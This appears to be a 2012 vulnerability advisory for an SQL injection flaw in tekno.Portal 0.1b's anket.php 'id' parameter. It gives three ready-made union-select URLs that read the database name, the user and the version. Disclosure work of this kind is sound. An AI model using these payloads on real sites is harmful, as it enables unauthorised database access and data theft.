Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28519
HistorySep 03, 2012 - 12:00 a.m.

tekno.Portal 0.1b - SQLi Vulnerability in "anket.php"

2012-09-0300:00:00
vulners.com
34

    ################################################################
    # Title: tekno.Portal 0.1b - SQLi Vulnerability in "anket.php" #
    ################################################################

Date: [07-25-2012]

Author: Socket_0x03 (Alvaro J. Gene)

Email: [email protected]

Website: www.teraexe.com


Vulnerable Application: tekno.Portal

Version: 0.1b

File: anket.php


SQL Injection:
http://www.website.com/teknoportal/anket.php?id=[SQLi]

Example of SQLi:
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,database(),5
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,user(),5
http://www.website.com/teknoportal/anket.php?id=-1+union+select+1,2,3,@@version,5